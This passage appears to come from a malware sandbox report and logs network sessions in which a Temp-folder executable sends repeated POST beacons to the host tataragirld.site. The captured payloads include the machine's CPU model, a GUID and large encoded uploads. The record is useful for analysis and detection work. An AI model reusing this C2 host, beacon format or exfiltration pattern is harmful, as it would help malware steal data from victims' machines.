                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:15 GMT
                                                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 50088 | 188.114.97.3 | 443 | 1532 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:30 UTC | 504 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 131275
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
2025-01-07 12:19:31 UTC | 849 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:31 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykLV4a65X7JyR1GVjy9QFiAEDoEjC7tVIfPuOMGNNtQS%2BMdDVqcifLfm%2FNWKHu3nOzuTWrji7aa%2F9t5uHct9xcLG%2FqrkMVW%2Bp50bthYNLmYfC%2BLn2fseL1PQSyudwBS3wLy4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e582992143aa-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1585&rtt_var=605&sent=48&recv=139&lost=0&retrans=0&sent_bytes=2840&recv_bytes=132789&delivery_rate=1793611&cwnd=241&unsent_bytes=0&cid=1503d2bd5b84093c&ts=786&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 50089 | 188.114.97.3 | 443 | 1532 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:31 UTC | 501 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 745
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:31 UTC745OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 95 00 00 00 6f d8 2a 27 88 00 00 00 08 00 00 00 00 03 03 03 6c db 29 24 03 03 03 03 03 03 03 03 91 c3 93 61 03 03 03 6c db 29 24 03 03 03 03 03 03 03 03 53 48 05 05 2f 03 03 03 03 03 03 03 2e 03 2e 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 53 48 05 04 03 03 03 03 03 03 03 03 03 03 03 03 02 03 03 03 53 48 06 05 03 03 03 03 fc fc fc fc fc fc fc fc fc fc fc fc 03 03 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 78 a6 e5 24 53 87 99 33 a7 00 00 00 a6 aa 95 35 88 00 00 00 08 00 00 00 16 03 03 03 a5 a9 96 36 03 03 03 03 03 03 03 03 91 c3 91 96 c3 01 02 a0 91 c3 03 a3 96 c3 02 02 a0 91 c3 03 a3 61 03 03 03 a5 a9 96 36 03 03
                                                                                                                                                                                                                                                                                                Data Ascii: o*'l)$al)$SH/..SHSHx$S356a6
2025-01-07 12:19:32 UTC | 840 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:31 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z4BDjJLc%2F4Ovu3BiPEQJ1MtiyFYIYgNDhL4grQoHw%2FrkM%2F5wGUOHREqg9sfmkorSMtDNmJOUuKaDMZUHM%2BEGY3FOVCTC2yLuOQXERHv7H1SyhxbkrwGrqIN7OLzjtEUulout"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e58b7df09e08-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2030&rtt_var=770&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1882&delivery_rate=1411992&cwnd=163&unsent_bytes=0&cid=c194d8876d129e74&ts=310&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 50090 | 188.114.97.3 | 443 | 5440 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:32 UTC | 391 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                Content-Length: 147
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC147OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 00 60 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 8f 02 20 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                                Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd $9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-07 12:19:32 UTC | 858 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:32 GMT
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R3vEAkGrZIXwFLbXi0V58GqBgBeQRlKJQAtCX1a42vvFjYidC1ltVsLAEcnDuGImkF7FgWOtlqW01e%2FKyaqIE9KDOruFLGVL1sXryJJ5HiBfB4ukwZn2zCIJ%2Fo7%2FLD9BeTFq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e591089142d8-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1927&min_rtt=1923&rtt_var=730&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1174&delivery_rate=1491317&cwnd=222&unsent_bytes=0&cid=9d75a8214e0f8048&ts=471&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 50091 | 188.114.97.3 | 443 | 1532 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:32 UTC | 501 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 212
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC212OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 99 00 00 00 b9 96 dc 04 88 00 00 00 08 00 00 00 04 03 03 03 ba 95 df 07 03 03 03 03 03 03 03 03 90 c3 c3 91 c3 92 03 61 03 03 03 ba 95 df 07 03 03 03 03 03 03 03 03 53 48 05 05 2f 03 03 03 03 03 03 03 2e 03 2e 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 53 48 05 04 03 03 03 03 03 03 03 03 03 03 03 03 02 03 03 03 53 48 06 05 03 03 03 03 fc fc fc fc fc fc fc fc fc fc fc fc 03 03 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 78 a6 e5 24 53 87 99 33 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                                Data Ascii: aSH/..SHSHx$S3
2025-01-07 12:19:33 UTC | 838 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:32 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MLsEC6Wso4o13VcMZDnx2TWqolj5B8%2BL3GLqEqCHYIbE5Wd04RR2NQaAyvuftK%2F5vSw0RLxqfeNrCpjuqxcdr4RQxdOm0ZvasAh5jDEQSVMiiFuDWSrIsko2OH%2BMCSXYQMVH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e591ea5018ea-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1457&rtt_var=581&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1349&delivery_rate=1829573&cwnd=244&unsent_bytes=0&cid=5e765ce26dca5751&ts=324&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 50092 | 188.114.97.3 | 443 | 1532 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:33 UTC | 501 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 380
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
2025-01-07 12:19:33 UTC | 834 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:33 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2FUqigZp2gXdmAmWK2i0wroMysL2Na3DKgUlO8jsAUD324YIhMOJu7QwBeLu1KPe3l0SpJGi5nVgElSuk1YGiGVRLQONfEGfbU1E6tQKAflOeecGNmzqIvScgaERpey27SOq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e59769f64358-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1575&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1517&delivery_rate=1789215&cwnd=206&unsent_bytes=0&cid=458702b1b227f742&ts=294&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 50093 | 188.114.97.3 | 443 | 5440 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:33 UTC | 500 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 53
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
2025-01-07 12:19:33 UTC | 53 | OUT | Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 03 02 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii:
2025-01-07 12:19:34 UTC | 752 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:34 GMT
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FdmDLvnnbdgJgEcmBNrieKQrIH5TMPa87Rv8epNSZjs0d690le1esruI5%2BvGQO0htmeI4y5zErSMvEASDjc8zYII3VqzcZPBf9qRRuoE7%2BUS%2FlGNDleAjFyZ16CX%2FPxePHD%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e598d934c3ee-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1493&rtt_var=576&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1189&delivery_rate=1871794&cwnd=247&unsent_bytes=0&cid=224f5d1f0d09a3ed&ts=314&x=0"
2025-01-07 12:19:34 UTC | 74 | IN | Data Raw: 34 34 0d 0a 34 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 91 9a ce 13 46 04 fb ce 0f 15 64 32 ce 27 2a d8 6f ce 17 c1 ba e8 ce 04 dc 96 b9 ce 35 95 aa a6 ce 12 24 ea 41 ce 3f 61 53 c9 ce 1b 10 e8 88 ce 38 3a fb 45 0d 0a
Data Ascii: 444Fd2'*o5$A?aS8:E
2025-01-07 12:19:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 50094 | 188.114.97.3 | 443 | 1532 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:34 UTC | 502 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 9953
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
2025-01-07 12:19:35 UTC | 844 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:34 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B4Rl132WLX5fcyd7NFLJqshb%2FMkSUetF5Q74aMZidBTa%2F25XwUVy2df0AqCWmeIm44VscjpkIXwdeUh%2FUhtRz8FuN%2ByOm5Yd9ARLEcFO%2F3pswSVMNM26jeY5tUnJyUzIevt6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e59e189d0f68-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1487&rtt_var=570&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=11113&delivery_rate=1898569&cwnd=238&unsent_bytes=0&cid=580b70ddcc85e6e0&ts=362&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 50095 | 188.114.97.3 | 443 | 5440 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:34 UTC | 502 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 9953
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
2025-01-07 12:19:35 UTC | 835 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:35 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oumiaImEuhzT58OekwFdMcI9YqM3z2S%2Fl6CNeyTeMTMqzIXwpab9LjfjAbSHLUNWXQEKkK1uzQmHLyT0JWNs2aliComzVW5Q0Gzjb7ZtwB2HtKgp4U0NEFlkzfmvdw0Egc5H"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e59f1c38f5f8-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1652&rtt_var=633&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=11113&delivery_rate=1709601&cwnd=91&unsent_bytes=0&cid=64b703ceaa4c1d3f&ts=290&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 50096 | 188.114.97.3 | 443 | 1532 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:36 UTC | 503 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 66611
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
2025-01-07 12:19:36 UTC | 839 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:36 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BOnlysmaJiI2OcWhk1jC%2FJmkbBh441s8UO6bR8YjZscy7rqr8AZ4V5dFFjWjjDMaZnfk4Bj9bT2VyrXeFNeQh2ARjjQw6EvVJi70KIRDeJVUZqS6UeWWAuHTYZkWDdnGg32K"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e5a6c8758c29-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1765&rtt_var=685&sent=27&recv=73&lost=0&retrans=0&sent_bytes=2841&recv_bytes=67926&delivery_rate=1572428&cwnd=188&unsent_bytes=0&cid=81b61c672099fb2d&ts=565&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 50097 | 188.114.97.3 | 443 | 5440 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
